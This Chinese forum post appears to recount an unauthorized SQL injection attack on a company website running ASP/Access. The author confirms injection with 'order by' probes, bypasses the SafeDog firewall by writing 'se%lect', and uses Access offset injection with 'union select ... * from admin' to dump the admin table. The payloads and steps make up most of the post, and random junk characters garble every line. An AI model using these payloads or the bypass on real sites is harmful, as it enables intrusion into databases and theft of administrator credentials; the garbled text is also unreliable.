打开网站,一个企业站。' r' T: B/ u/ ?
+ Q; i# t9 {3 N+ [, a5 H& t' |7 c6 m
1 I e- J! N0 D/ k9 ^4 {) `& R
顺手加个admin
3 [- z: \, ~- Z, K1 g$ |3 I6 T" m) y
$ S t% J1 R, K k默认后台。6 d2 W, V, A7 C: a- q5 S" u
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。2 X a! I) |; u& Y2 Z# ^
2 o/ D {6 ^5 w& B
2 S% p( D8 G7 p; f9 K0 U
' {3 O6 e" I# J( C
所以就不用御剑扫了,待会直接封IP。2 q8 z0 x, l3 V" R( J. B
% t: p+ t% Z# h3 d
用order by语句判断是否存在注入。7 z) K( ]8 g/ h% m+ [+ ?
http://www.xxx.com /product_show.asp?id=997 order by 1
% @& S' O0 K. J+ t) X; f* Hhttp://www.xxx.com /product_show.asp?id=997 order by 1005 t- r! @ y" [! ]' o
现在存在注入,经测试后发现是9个字段。
( F# t4 K7 W# B! y
7 D; b0 e1 g) |8 ^: v, ?7 t接下来进行联合查询,猜是否存在admin表。+ D3 c' I$ g1 b& M8 n4 o; u' w
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
1 p3 c+ ` I5 i6 G8 h8 o" r$ b) z& T4 J# Z" {* d/ Y
6 P. K0 c4 p7 n2 ]7 n
2 z$ [' h, N9 N9 h
在select中间加个%,se%lect绕过安全狗。3 W: {: I- z) V* l/ T/ m8 n* C( {
' h3 H( ]( l% _7 }! Q1 q F% O5 N2 G( c8 F- C
发现存在admin表,然后开始手工猜常用的字段。
. Y3 e. I' p2 A8 @9 o9 |% b7 D纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
; e3 \; e2 ?$ n! T5 | J! B
/ D6 [5 g0 H& y( y/ m突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
7 M( y6 r9 G7 a( n5 B" }& f 1 \. U* \$ T6 d: g" V" J+ L8 C1 Q
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
! X! l- u0 S8 M1 S4 yhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
8 Q/ A- r) x0 N* A5 i) v# n好了,敏感内容出显了。
1 k: U( |# r' P7 e+ v+ i( z: _; h6 W2 r3 A' V* M5 U, u% m
' C9 Y- S. e$ A5 E# Y/ X8 L1 B: K! F- F/ O6 Z# O9 ^# z
|